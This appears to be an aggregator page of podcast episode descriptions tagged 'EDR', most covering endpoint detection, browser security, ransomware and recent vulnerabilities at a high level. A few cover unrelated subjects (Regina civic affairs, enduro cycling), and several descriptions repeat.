Podcasts about EDR

Dr. Anton Chuvakin, Security Advisor at Office of the CISO, Google Cloud and a recognized expert in SIEM, log management, and PCI DSS compliance, will help us cut through the buzzwords and discuss modern security operations.Join the Defender Fridays community, live every Friday, to discuss the dynamic world of information security in a collaborative space with seasoned professionals.Dr. Chuvakin is now involved with security solution strategy at Google Cloud, where he arrived via Chronicle Security (an Alphabet company) acquisition in July 2019. He is also a co-host of Cloud Security Podcast.Until June 2019, Dr. Anton Chuvakin was a Research VP and Distinguished Analyst at Gartner for Technical Professionals (GTP) Security and Risk Management Strategies (SRMS) team. At Gartner he covered a broad range of security operations and detection and response topics, and is credited with inventing the term "EDR." He is a recognized security expert in the field of SIEM, log management and PCI DSS compliance. He is an author of books "Security Warrior", "PCI Compliance", "Logging and Log Management" and a contributor to "Know Your Enemy II", "Information Security Management Handbook" and others. Anton has published dozens of papers on log management, SIEM, correlation, security data analysis, PCI DSS, honeypots, etc. His blog securitywarrior.org was one of the most popular in the industry.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

Kybernetická bezpečnosť už dávno nie je len o antivíruse a heslách. Hoci sa firmy na Slovensku v základnej hygiene zlepšili, mnohé stále podceňujú sofistikovanejšie hrozby. Často investujú do pokročilých technológií, no nemajú kvalifikovaných ľudí, ktorí by ich vedeli správne vyhodnocovať a manažovať. Prečo je dôležité oddeliť IT od bezpečnosti a aké sú možnosti pre firmy, ktoré si vlastný bezpečnostný tím nemôžu dovoliť?V novom dieli podcastu SHARE sa moderátor Maroš Žofčin rozpráva s Júliusom Seleckým, Solution Architectom spoločnosti Eset, o reálnom stave kybernetickej bezpečnosti v slovenských firmách, o najčastejších chybách a o riešeniach, ako je manažovaná detekcia a reakcia (MDR). Podcast prinášame v spolupráci so spoločnosťou Eset.Pripravte sa na budúcnosť s knihou od redaktorov Živé.sk „Umelá inteligencia: Pripravte sa na budúcnosť“. Teraz aj ako ebook! TIP: https://zive.aktuality.sk/clanok/0RfdZVW/nahliadnite-do-buducnosti-vydavame-knihu-o-umelej-inteligencii/V podcaste hovoríme aj o týchto témach:V čom sa slovenské firmy zlepšili (heslá, aktualizácie) a čo stále podceňujú.Prečo by IT oddelenie a bezpečnostné oddelenie mali byť striktne oddelené.Analýza rizík: Ako majú firmy identifikovať, čo je pre ich biznis kľúčové.Čo sú EDR a XDR systémy a prečo bežný antivírus už nestačí.Aké sú možnosti pre firmy, ktoré nemajú vlastných bezpečnostných expertov (MDR).Téme sa venujeme aj v článku: https://zive.aktuality.sk/clanok/nmdWnCW/firmy-maju-antivirusy-no-chyba-im-tato-klucova-vec-mnohe-na-to-doplatili/ Podcast SHARE pripravuje magazín Živé.sk.

Ransomware detection is more complex than most organizations realize. In this episode, cybersecurity expert Mike Saylor breaks down the real-world signs of ransomware attacks—from users complaining about slow computers to smart devices acting strangely. We explore polymorphic malware that changes based on its target, the risks posed by managed service providers using shared credentials, and why milliseconds matter in ransomware detection and response. Mike explains the difference between EDR, XDR, SIEM, and SOAR tools, helping you understand which security solutions you actually need. We also discuss why 24/7 monitoring is non-negotiable and how even small businesses can afford proper ransomware detection capabilities. If you're trying to protect your organization without breaking the bank, this episode offers practical guidance on building your security stack and knowing when to call in expert help.

Send us a textYou can harden your network and still miss the front door: aging edge devices with elevated access, thin logging, and long‑ignored firmware. We dig into the uncomfortable truth behind “set it and forget it” firewalls, VPNs, and gateways, then lay out a practical Domain 7 playbook that helps you detect faster, respond cleaner, and recover without chaos.We start with the incident management sequence that actually works under pressure—detection, response, mitigation, reporting, recovery, remediation, and lessons learned—showing how legal timelines, stakeholder updates, and RTO/RPO planning fit together. From there, we map the controls that pull their weight: next‑gen firewalls and WAFs, IDS/IPS, smart whitelisting and blacklisting, sandboxing that anticipates time‑bomb malware, and when to lean on EDR, MDR, and UEBA to cut through alert fatigue.Then we get hands‑on with vulnerability and patch management, focusing on asset inventory, critical‑first prioritization, scanning automation, and staged deployments with real rollback plans. We connect the dots to change management so fixes don't become outages. Resilience gets its due: backup integrity and rotation, hot/warm/cold recovery sites, multi‑region processing, HA pairs, QoS to preserve critical traffic, and fault‑tolerant design that keeps services running when parts fail.Finally, we round out security operations with disaster recovery drills—from tabletop to full cutover—plus business continuity planning that aligns cyber recovery with revenue‑critical processes. Physical security and personal safety close the loop: layered access, surveillance, environmental controls, and travel and duress protocols that protect your people as well as your data. If you're preparing for the CISSP or sharpening a real program, you'll leave with concrete steps to reduce risk now and a roadmap to mature over time.Enjoyed this deep dive? Subscribe, share with a teammate who owns Domain 7, and leave a quick review to help others find the show. Your feedback shapes future topics and tools we build for you.Gain exclusive access to 360 FREE CISSP Practice Questions at FreeCISSPQuestions.com and have them delivered directly to your inbox! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

In this episode, Dr. Dave Chatterjee speaks with Anupam Upadhyay, Senior Vice President, Product Management, Palo Alto Networks, a seasoned product and cybersecurity leader, to unpack the “new browser wars” and why enterprise browsers are fast becoming a core battleground in the fight for digital trust. Drawing on over two decades of experience spanning Cisco, startups, and Palo Alto, Upadhyay traces the evolution of the humble browser from a passive content viewer into the primary interface for cloud applications, collaboration tools, and sensitive business data.The conversation examines the browser's expanding role as both a productivity hub and a primary attack vector—accounting for over 90 percent of initial intrusions via phishing, malicious extensions, or session hijacking. Through the lens of the Commitment-Preparedness-Discipline (CPD) Framework, Dr. Chatterjee and Anupam Upadhyay emphasize that securing the enterprise browser is not merely a technical exercise but a governance imperative: leadership commitment to zero-trust principles, preparedness through hardened configurations and employee training, and disciplined enforcement of consistent controls across devices and partners.Time Stamps• 00:49 — Dave's introduction and guest overview.• 03:00 — Anupam Upadhyay's career journey and reinvention at Palo Alto Networks.• 05:00 — Historical context: how browsers stayed outside the security spotlight.• 08:40 — Cloud and SaaS migration shifting business to the browser.• 11:20 — Emerging browser threats and data sanctity concerns.• 14:30 — Malicious extensions and the limits of traditional EDR.• 16:07 — Browser security as part of Zero Trust architecture.• 18:30 — Balancing security and user experience.• 22:10 — Operating in hostile environments and credential revocation.• 25:00 — Dr. Chatterjee introduces the CPD framework for governance.• 28:45 — Implementation and user adoption challenges.• 30:00 — Continuous testing and discipline in browser security.• 33:05 — Closing takeaways on Zero Trust mindset and defense-in-depth.Podcast summary with discussion highlights - https://www.dchatte.com/episode-93-the-new-browser-wars-why-the-enterprise-browser-has-become-cybersecuritys-next-battleground/Connect with Host Dr. Dave Chatterjee LinkedIn: https://www.linkedin.com/in/dchatte/ Website: https://dchatte.com/Books PublishedThe DeepFake ConspiracyCybersecurity Readiness: A Holistic and High-Performance ApproachArticles PublishedRamasastry, C. and Chatterjee, D. (2025). Trusona: Recruiting For The Hacker Mindset, Ivey Publishing, Oct 3, 2025.Chatterjee, D. and Leslie, A. (2024). “Ignorance is not bliss: A...

Three Buddy Problem (Episode 68): The buddies are trapped in timezone hell with cross-country travel this week. In this special episode, we present Juan Andres Guerrero-Saade's LABScon 2025 keynote-day presentation on the state of cybersecurity and why this phase of our collective project has failed, and how to build something smarter, more sustainable, and deeply interconnected in its place. Juanito traces the field's evolution from chaos to consolidation, weaving in cybernetics, standardization, and the dawning coexistence of human and artificial evaluative power. The result is part philosophical sermon, part rallying cry, an invitation to reject the industry's slave morality, rethink our tools, and steer the next era of defense with intention.

On this week's meeting agenda: • Aidan escaped the sub-basement and caught a showing of The Master Plan at the newly renovated Globe Theatre. • Admin has been talking for months about how they changed the city's Design Standards so that new residential roads will be wider. How did that happen? When did that happen? Why did that happen? We have the backstory on that. • Really good news from the Housing Accelerator front! Yay! • Economic Development Regina presented their 2026 budget to city council. It did not go well. • The Regina Public Library also presented their 2026 budget to city council. It didn't go great either but at least it went better than EDR's. • The Queen City Improvement Bureau's Halloween-adjacent 10th Anniversary LIVE Show is coming up October 29, 7pm at the Artesian on 13th! • The mayor made a big funding announcement for downtown. Note: Apologies for how Paul's voice sounds like a gravel quarry that's smoked a pack of cigarettes a day for 35 years. The doctors say there's nothing modern medicine can do to speed up his vocal recovery and the satanic rituals have not helped.

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-896

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Show Notes: https://securityweekly.com/psw-896

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-896

First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: Your vulnerability scanner is your weakest link Scams that almost got me The state of EDR is not good You don't need to do that on a phone or Raspberry PI Hash cracking and exploits Revisiting LG WebOS Hardening Docker images Hacking Moxa NPort Shoddy academic research The original sin of computing Bodycam hacking A new OS for ESP32 The AI bubble is going to burt Mobile VPNs are not always secure Show Notes: https://securityweekly.com/psw-896

Parce que… c'est l'épisode 0x645! Shameless plug 12 au 17 octobre 2025 - Objective by the sea v8 4 et 5 novembre 2025 - FAIRCON 2025 8 et 9 novembre 2025 - DEATHcon 17 au 20 novembre 2025 - European Cyber Week 25 et 26 février 2026 - SéQCure 2026 Description Introduction Dans cet épisode technique, Nicolas et Jordan Théodore abordent un changement de paradigme fondamental en cybersécurité d'entreprise. Le navigateur web est devenu l'élément principal du fonctionnement organisationnel, détrônant le desktop traditionnel. Cette évolution nécessite désormais de détecter et d'intervenir sur les navigateurs comme s'il s'agissait d'endpoints à part entière. Le navigateur, nouvelle cible privilégiée Depuis quelques années, les navigateurs web sont devenus une cible de choix pour les cyberattaquants. Cette concentration des attaques s'explique par plusieurs facteurs. La majorité des activités professionnelles transitent maintenant par le navigateur, que ce soit pour les emails, la suite bureautique ou les services en ligne. Cette migration s'est accélérée au cours des dix dernières années avec l'abandon progressif des clients lourds au profit d'applications web, popularisées notamment par Google avec sa suite bureautique entièrement en ligne. Microsoft suit également cette tendance avec la migration de sa propre suite vers le web. Les attaquants exploitent ce vecteur d'attaque pour diffuser des malwares via des sites piégés, mener des campagnes de phishing particulièrement efficaces, et exploiter les vulnérabilités des navigateurs ou des extensions malveillantes. Les navigateurs modernes sont devenus des environnements riches qui stockent des informations sensibles, des mots de passe, des données en cache et même des bases de données locales, constituant ainsi un tremplin très important pour les acteurs malveillants. Les vulnérabilités critiques Jordan illustre la gravité de ces menaces avec des exemples concrets de vulnérabilités récentes. En 2023, des failles critiques dans la librairie libwebp ont été notées 8.8 sur l'échelle CVSS V3, affectant tous les navigateurs basés sur Chromium, notamment Chrome, Edge et Brave, ainsi que parfois Firefox. Ces vulnérabilités exploitent souvent des techniques classiques comme le buffer overflow ou la corruption de stack. L'exemple le plus frappant concerne une faille permettant l'exécution de code arbitraire simplement par le chargement d'une image webp mal formée dans une page HTML. L'utilisateur n'a qu'à visiter une page contenant l'image malveillante pour que son navigateur vulnérable soit compromis, avec un minimum d'interaction. Cette simplicité d'exploitation est particulièrement préoccupante car ces images peuvent être hébergées sur des plateformes légitimes comme OneDrive, Dropbox ou Google Drive, contournant ainsi les filtres de proxy traditionnels qui autorisent généralement ces services d'entreprise. Les défis du déploiement en entreprise Dans les grandes organisations, comme l'exemple donné d'une entreprise du CAC 40 comptant 17 000 employés en France et 130 000 dans le monde, la mise à jour des navigateurs n'est pas aussi simple qu'il y paraît. Le taux de convergence du déploiement peut être considérablement long, particulièrement avec la généralisation du télétravail. Cette fenêtre d'exposition prolongée nécessite des solutions alternatives pour pallier le délai d'application des correctifs. Les solutions de sécurité Face à ces menaces, trois couches de défense principales ont émergé. Les EDR (Endpoint Detection and Response) jouent toujours un rôle crucial en suivant les activités côté poste client et en détectant les comportements suspects. Par exemple, CrowdStrike a récemment ajouté des capacités dédiées pour inventorier les extensions Chrome et Edge, vérifier leurs niveaux de permission et identifier les sources douteuses. Un EDR bien configuré peut détecter des comportements anormaux comme Chrome déclenchant une commande exécutable. Cependant, les EDR sont de plus en plus facilement contournés par des techniques avancées qui patchent les mécanismes de détection. Une nouvelle couche de défense s'est donc développée directement au sein des navigateurs avec les extensions de sécurité. Ces modules additionnels peuvent bloquer activement les contenus malveillants et surveiller les actions utilisateur. On trouve des solutions open source comme Privacy Badger ou NoScript, ainsi que des produits commerciaux comme Capsule Security et Square X offrant de l'isolement à distance. Ces extensions assurent plusieurs fonctions essentielles. Elles filtrent les URL en bloquant l'accès aux pages exploitant des CVE ou hébergeant des malwares. Elles analysent le contenu avant téléchargement en scannant les fichiers HTML, JavaScript et images avant leur exécution complète. Elles bloquent les scripts inconnus, réduisant la surface d'exploitation, et protègent contre les publicités malveillantes, l'injection de code via iframes et le fingerprinting. Elles intègrent également des fonctionnalités DLP pour éviter l'upload de fichiers corporates sur internet, notamment vers des services comme ChatGPT où les employés peuvent involontairement partager des informations sensibles. L'extension développée par Glims, par exemple, vérifie tout contenu téléchargé pour détecter les malwares et contrôle les données uploadées pour prévenir les fuites d'information, incluant le copier-coller vers des sites externes. Ces extensions envoient des signaux au SOC (Security Operations Center) pour une meilleure visibilité et permettent d'intervenir rapidement si nécessaire. Les navigateurs sécurisés Au-delà des extensions, des navigateurs pensés pour la sécurité ont émergé. Brave, lancé il y a six ans, force l'accès HTTPS, filtre le phishing et bloque contenus indésirables, publicités et trackers. Des solutions comme Island et Talon proposent des navigateurs basés sur Chromium avec des contrôles de sécurité et DLP intégrés, bloquant par exemple les impressions d'écran et le copier-coller sur certains sites. Limites et complémentarité Les extensions ne peuvent pas tout faire. Elles ne voient pas ce qui se passe en mémoire et ne détectent pas les exploits de type use-after-free ou corruption mémoire. Elles peuvent être désactivées via JavaScript par click-jacking et ne protègent pas l'OS. D'où l'importance d'une approche complémentaire combinant EDR et extensions de navigateur. Bonnes pratiques en entreprise Pour renforcer la sécurité, les organisations doivent forcer une liste blanche d'extensions via GPO, installer des extensions de sécurité managées pour remonter les informations au SOC, utiliser un bon EDR pour surveiller toutes les extensions, et corréler les logs du navigateur avec ceux des endpoints lors des investigations. Le navigateur doit être considéré comme un petit poste à l'intérieur du grand poste pour tracer efficacement les actions malveillantes. Cette approche représente une nouvelle réalité de la cybersécurité où les attaquants s'adaptent constamment, nécessitant une évolution parallèle des défenses. Collaborateurs Nicolas-Loïc Fortin Jordan Theodore Crédits Montage par Intrasecure inc Locaux virtuels par Riverside.fm

In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community.A newly disclosed vulnerability in Redis, dubbed RediShell and tracked as CVE-2025-49844, affects all Redis versions and carries a maximum CVSS score of 10.0.Cisco has disclosed a critical zero-day vulnerability—CVE-2025-20352—affecting its widely deployed IOS and IOS XE software, confirming active exploitation in the wild.Researchers at NCC Group have found that voice cloning technology has reached a level where just five minutes of recorded audio is enough to generate convincing voice clones in real time.A China-linked cyber-espionage group, tracked as UNC5221, has been systematically targeting network infrastructure appliances that lack standard endpoint detection and response (EDR) support.Dutch authorities have arrested two 17-year-old boys suspected of being recruited by pro-Russian hackers to carry out surveillance activities.Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform.This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

The browser has quietly become the most critical—and most overlooked—attack surface in cybersecurity. In this episode of the Brilliance Security Magazine Podcast, host Steven Bowcut talks with John Carse, Field CISO at SquareX, about the company's groundbreaking Browser Detection and Response (BDR) technology and why legacy tools like EDR and Secure Web Gateways can't see today's browser-native threats.John draws on his two decades of global cybersecurity experience—spanning the U.S. Navy, JPMorgan, Expedia, and Dyson—to explain emerging risks like Syncjacking, Polymorphic Extensions, and the coming wave of AI-powered browser agents. He also shares practical steps for CISOs to reduce risk from Shadow SaaS and unmanaged devices.If you think your browser is safe, this episode will make you think again.

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-895

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Show Notes: https://securityweekly.com/psw-895

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-895

This week we kick things off with a special interview: Kieran Human from Threat Locker talks about EDR bypasses and other special projects. In the security news: Hacking TVs Flushable wipes are not the only problem People just want to spy on their pets, except the devices can be hacked Linux EDR is for the birds What does my hat say we love exploits and hashes ESP32s in your router RF signal generator on a PI Zero Mic-E-Mouse and other things that will probably never happen, until they do Hacking with money Uninitialized variables and other things the compiler should catch Breaking out of the shell Hacking with sound, for real, not just another side channel attack Bring back 2G When the game engine gets hacked Oracle 0-days This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Show Notes: https://securityweekly.com/psw-895

Parce que… c'est l'épisode 0x642! Shameless plug 12 au 17 octobre 2025 - Objective by the sea v8 14 et 15 octobre 2025 - ATT&CKcon 6.0 14 et 15 octobre 2025 - Forum inCyber Canada Code rabais de 30% - CA25KDUX92 4 et 5 novembre 2025 - FAIRCON 2025 8 et 9 novembre 2025 - DEATHcon 17 au 20 novembre 2025 - European Cyber Week 25 et 26 février 2026 - SéQCure 2026 Description Dans cet épisode du podcast Sécurité technique, l'animateur reçoit Charles F. Hamilton pour discuter des tendances en cybersécurité à surveiller pour la fin de l'année 2025. La discussion s'amorce sur une réalité préoccupante : l'automne marque une période de forte activité tant pour les équipes légitimes que pour les cybercriminels, avec une hausse notable des incidents de sécurité nécessitant des réponses d'urgence. La complexité d'Azure : un terrain propice aux vulnérabilités Un des points majeurs abordés concerne la plateforme Azure de Microsoft. Une vulnérabilité récemment publiée permet de prendre le rôle Global Admin sur tous les tenants Azure, illustrant parfaitement les dangers liés à la complexité excessive de cet écosystème. Cette faille, découverte par manipulation de jetons de service, rappelle les problèmes similaires rencontrés avec Active Directory Certificate Services il y a quelques années. La complexité d'Azure réside dans ses multiples méthodes d'authentification, ses contextes variés et ses centaines d'applications déployées par défaut dans chaque tenant. Les organisations ajoutent souvent leurs propres applications avec des permissions mal configurées, créant involontairement des chemins d'accès privilégiés. Le problème s'aggrave car il n'existe pas d'outils officiels de Microsoft pour auditer ces configurations, forçant les équipes de sécurité à se fier à des scripts PowerShell disparates ou à des outils développés par la communauté. Le faux sentiment de sécurité Un exemple frappant illustre le décalage entre la perception et la réalité de la sécurité : lors d'un test red team, un client disposait d'une infrastructure de sécurité impressionnante incluant filtrage réseau, EDR, NDR et autres solutions avancées. Paradoxalement, l'outil d'accès à distance légitime a été bloqué, nécessitant trois jours pour configurer des exceptions. En revanche, le payload malveillant a passé sans problème, sans générer aucune alerte. Cette situation démontre que ces outils créent souvent plus de complexité pour les équipes IT légitimes qu'ils ne protègent réellement contre les menaces sophistiquées. Le fossé entre red team et blue team La discussion révèle un écart de compétences préoccupant entre les équipes offensives et défensives. Les red teamers investissent constamment dans l'apprentissage de nouvelles techniques, tandis que les équipes défensives ont tendance à s'appuyer aveuglément sur l'intelligence artificielle de leurs outils de sécurité. Le threat hunting, pourtant essentiel, demeure rare au Québec et au Canada, malgré la disponibilité des données nécessaires dans les solutions EDR et NDR. Un test révélateur : demander à des professionnels d'expliquer le fonctionnement de SecretDump, un outil largement utilisé. Très peu peuvent fournir une réponse complète sur ses mécanismes internes et les artefacts qu'il laisse. Cette lacune empêche les red teamers d'expliquer efficacement aux équipes bleues comment détecter leurs actions. La sophistication des attaquants : un mythe à déconstruire Contrairement à la perception populaire, la majorité des attaquants ne sont pas particulièrement sophistiqués. Ils suivent des playbooks répétitifs et comptent sur le volume pour réussir. Les intervenants ont observé des cas où des attaquants ont obtenu des accès privilégiés, puis ont immédiatement alerté leurs victimes par des actions bruyantes comme tenter de rendre publics tous les dépôts GitHub d'une entreprise. Paradoxalement, les red teamers modernes développent des techniques si avancées qu'ils représentent désormais un niveau de sophistication comparable aux groupes parrainés par des États-nations, un scénario irréaliste pour la plupart des petites et moyennes entreprises québécoises. Cette situation crée un décalage : on teste la capacité à détecter des attaques extrêmement sophistiquées alors que les vraies menaces utilisent des méthodes beaucoup plus basiques. Les tendances à surveiller pour l'automne 2025 Plusieurs éléments méritent une attention particulière pour la fin de l'année : Les vulnérabilités sur les équipements périmétriques : Les solutions VPN de Cisco, SonicWall et Fortinet ont toutes été touchées récemment. Les délais d'exploitation se comptent maintenant en heures après la publication d'une vulnérabilité, amplifiés par la publication immédiate de preuves de concept sur les réseaux sociaux. L'audit des tenants Azure et Google Enterprise : Les vecteurs d'attaque identifiés sur Azure s'appliquent également aux environnements Google Enterprise. Les organisations doivent absolument auditer leurs applications, leurs permissions et leurs configurations. Les employés infiltrés : Une tendance émergente concerne l'embauche de développeurs travaillant pour des pays politiquement non neutres, qui obtiennent un accès au code source dans le but apparent de voler la propriété intellectuelle. Les vulnérabilités GitHub Actions : Les fuites de clés API continuent de poser problème, avec des délais d'exploitation extrêmement rapides. Le problème de la publication des preuves de concept La course à la visibilité pousse certains chercheurs en sécurité à publier immédiatement des preuves de concept complètes, parfois dans l'heure suivant la découverte d'une vulnérabilité. Cette pratique, combinée à l'intelligence artificielle capable de générer du code fonctionnel à partir de bulletins de sécurité, met les organisations en danger avant qu'elles n'aient le temps d'appliquer les correctifs. Un retour aux pratiques de divulgation responsable avec un délai minimum de 80 jours serait bénéfique. Conclusion : l'importance de l'éducation Le podcast se termine sur l'importance cruciale de l'éducation en cybersécurité. Plutôt que de se focaliser uniquement sur l'utilisation d'outils, les professionnels doivent comprendre les fondements : comment fonctionne Windows, comment un programme s'exécute, comment créer ses propres exploits. La simplicité est souvent plus efficace que la complexité. Les solutions les plus durables reposent sur une compréhension approfondie des systèmes plutôt que sur l'accumulation d'outils sophistiqués dont personne ne maîtrise vraiment le fonctionnement. Collaborateurs Nicolas-Loïc Fortin Charles F. Hamilton Crédits Montage par Intrasecure inc Locaux virtuels par Riverside.fm

William Scheele – Norgesmester i enduro 2025, var nummer 16 sammenlagt i EDR (verdenscup enduro) da han ga seg for sesongen, og tok 2.-plass i NM utfor på stisykkelen. Og sikkert et helvetes lass med KOMs på Strava. Vi tar en grundig prat om sesongen – høydepunkter, nedturer og livet som privateer som bor halve året i en liten campingbil. Vi skravler også om trening, hvorfor det gikk så bra i år, den nye Ibis-sykkelen hans, om man sykler fortere hvis man drikker Redbull – og ikke minst: flats vs. klikk. Hva er best? Her legger vi diskusjonen død én gang for alle. Ps: Vi prater selvsagt om dekk, demperoppsett, Fox Live Valve, om 29/29 er raskere enn 29/27.5 ... Praten flyter lenge! Så hent en iskald sixpack, en stor pose popcorn – og sett i gang episoden! Episode links: @william.scheele @ibiscycles @ibiscyclesnorge @team_ibis_norway @probikeno @dharcoclothing @delernorge @maxxisbike @alpinestars_cycling @vertical_playground @ridefoxbike @jensenscheelebil https://www.terrengsykkel.no/sykkelprofiler/blant-de-beste-i-verden ----more---- Takk til: Rufus Preiss og Top Tubes Mountain Bike og DMR sykkeldeler Sjekk ut DMR-produkter her på  https://www.dmrbikes.com/ og ta kontakt med @therealtoptubes på Instagram for mer info! Rufus tar nå inn Zerode sykler - sjekk ut på https://zerodebikes.com/ og ta kontakt med Rufus for pris og mer info! ----more---- Forslag til spørsmål, tema eller gjest? Send oss en PM på Instagram: @otbpodden ----more---- Takk til: Quarter Wolf for bruk av introlåt: Her kan du følge nyhetene fra bandet - konserter, plateslipp og merch!  

In the world of cybersecurity, there are big lies that have been perpetuated about compliance, fixability and communication--and it's time to burn it all down and start over.  Many experts see one main cybersecurity truth, especially about AI, SIEM, EDR and related business technology. By examining the intersection of AI, cybersecurity, and compliance, we can gain a deeper understanding of the lies that have been told about the state of cybersecurity and work towards a more secure future. Tune in to this thought-provoking Send us a textGrowth without Interruption. Get peace of mind. Stay Competitive-Get NetGain. Contact NetGain today at 844-777-6278 or reach out online at www.NETGAINIT.com Support the show

In this episode, hosts Adam Morris and Daniel Welling welcome guest Phil McGowan to discuss the innovative security solutions offered by Huntress, particularly focusing on their endpoint detection and response (EDR) and 24/7 security operations centre (SOC) services. They dive into how these tools help Managed Service Providers (MSPs) enhance their security offerings for small and medium-sized businesses. The conversation covers the key benefits of Huntress's products, including ease of integration, affordability compared to enterprise solutions, and trial opportunities. The hosts also explore the practical ways MSPs can explain and sell these security solutions to their clients, ensuring clarity and value. The episode highlights the importance of making enterprise-grade security accessible and manageable for businesses of all sizes.    00:00 Introduction and Welcome  01:03 Understanding MSP Security Challenges  02:32 Explaining EDR to Clients  04:32 Huntress' Unique Approach to Cybersecurity  08:05 The Value of 24/7 SOC  12:19 Commercial Considerations for MSPs  19:05 Affordability and Democratization of Security Tools  27:01 Conclusion and Contact Information    Connect with Phil McGowan on LinkedIn by clicking here –https://www.linkedin.com/in/mcgowanphil/  Connect with Daniel Welling on LinkedIn by clicking here –https://www.linkedin.com/in/daniel-welling-54659715/  Connect with Adam Morris on LinkedIn by clicking here – https://www.linkedin.com/in/adamcmorris/    Visit The MSP Finance Team website, simply click here –https://www.mspfinanceteam.com/      MSP Glossary: MSP Finance Glossary Explained | MSP Finance Team    We look forward to catching up with you on the next one. Stay tuned! 

Why NDR is Evolving—And What Enterprises Should Demand From ItIn this episode of  the @Endace Packet Forensic Files, Michael Morris is joined by Jack Chan, VP of Product and Field CTO at Fortinet, to unpack what makes a truly effective Network Detection and Response (NDR) solution. Jack shares his perspective on why visibility, historical context, and deep threat hunting capabilities matter more than flashy features.They explore how AI and machine learning are transforming NDR—helping detect threats in encrypted traffic and reduce alert fatigue for SOC teams. Jack also talks about integrating NDR with firewalls and EDR tools to improve response decisions and streamline investigations.Finally, Jack leaves us with a powerful reminder: security starts with people. From secure coding to user awareness, the human element is often the weakest link—and the best place to strengthen your defences.ABOUT ENDACE *****************Endace (https://www.endace.com) is a world leader in high-performance packet capture solutions for cybersecurity, network and application performance. EndaceProbes are deployed on some of the world's largest, fastest and most critical networks. EndaceProbe models are available for on-premise, private cloud and public cloud deployments - delivering complete hybrid cloud visibility from a 'single-pane-of-glass'.Endace's open EndaceProbe Analytics appliances (https://www.endace.com/endaceprobe) can be deployed in on-prem locations and can also host third-party security and performance monitoring solutions while simultaneously recording a 100% accurate history of network activity.

Three Buddy Problem - Episode 65: We zero in on one of the biggest security stories of the year: the discovery of a persistent multi-stage bootkit implanting malware on Cisco ASA firewalls. Details on a new campaign, tied to the same threat actors behind ArcaneDoor, exploiting zero-days in Cisco's 5500-X series appliances, devices that sit at the heart of government and enterprise networks worldwide. Plus, Cisco's controversial handling of these disclosures, CISA's emergency deadlines for patching, the absence of IOCs and samples, and China's long-term positioning. Plus, thoughts on the Secret Service SIM farm discovery in New York and evidence of Russians APTs Turla and Gamaredon collaborating to hit Ukraine targets. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Ryan Naraine (https://twitter.com/ryanaraine) and Costin Raiu (https://twitter.com/craiu).

